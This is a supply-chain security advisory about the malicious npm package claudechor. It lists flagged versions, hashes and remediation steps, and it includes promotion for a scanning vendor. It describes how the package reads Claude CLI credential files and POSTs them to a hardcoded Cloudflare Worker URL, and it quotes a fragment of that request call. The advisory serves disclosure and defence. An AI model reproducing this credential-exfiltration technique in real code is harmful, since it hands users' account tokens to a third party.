Which versions of claudechor are malicious?

The following npm versions of claudechor are flagged malicious: 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5. Treat any of these as compromised.

How do I remediate claudechor if I installed it?

Remove claudechor from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is claudechor part of a known attack campaign?

Yes — claudechor is associated with the IN-MAL-2026-006242, IN-MAL-2026-006241, IN-MAL-2026-006240, IN-MAL-2026-006238, IN-MAL-2026-006239 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect claudechor in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking claudechor and packages like it before any post-install script runs.

Malicious package

claudechornpm

Malicious code in claudechor (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5717

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall claudechor

What this malware does

The package's bin entry reads installer-owned Claude credential files (~/.claude/.credentials.json and ~/.claude.json) — written by Anthropic's official Claude CLI, not by this package — and POSTs their contents in plaintext JSON to a hardcoded endpoint https://tfer.jha-anurag2017.workers.dev (a personal Cloudflare Worker unrelated to Anthropic). index.js:9 hardcodes WORKER_URL; index.js:78-83 reads the two credential files and calls request("POST", "/${name}", { data: JSON.stringify(files) }) keyed by <hostname>-<username> (collected via os.hostname() / os.userInfo() at index.js:146). The default invocation claudechor with no arguments runs cmdPush immediately, with no confirmation. AES-256-GCM encrypt/decrypt helpers are defined in the file but are dead code in the push path, so the OAuth/session tokens leave the host unencrypted at the application layer. The README is effectively empty (# tfer) and nothing in the package metadata discloses that the bin uploads third-party credentials to a personal endpoint. Anyone who runs the CLI surrenders their Anthropic account access to the package author.

Malicious versions

5 flagged

1.0.11.0.21.0.31.0.41.0.5

Indicators of compromise (SHA-256)

2f3e2adf26b9818ea4bc994cb5c97968b857e93cb14bb41cd51a282f661f50f4

63afdbd3ab1c6154fc3fc44411d414f1b86ff93b93b51f4e6d58e543a360c3ce

b287ba5c7aa29a347b3076df079ccc9243a83e42d8e920d6448965078fbbc18b

d756d247f56c9b24b6f651f544620388c87e46647cc96929cd601347af2ea152

4a9cbb36cf7ed82685830b5d3a2b341bff9ef86e2688842d1f54259b2b6fb533

Frequently asked questions

No. claudechor on npm has been identified as a malicious package (versions 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006242IN-MAL-2026-006241IN-MAL-2026-006240IN-MAL-2026-006238IN-MAL-2026-006239

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection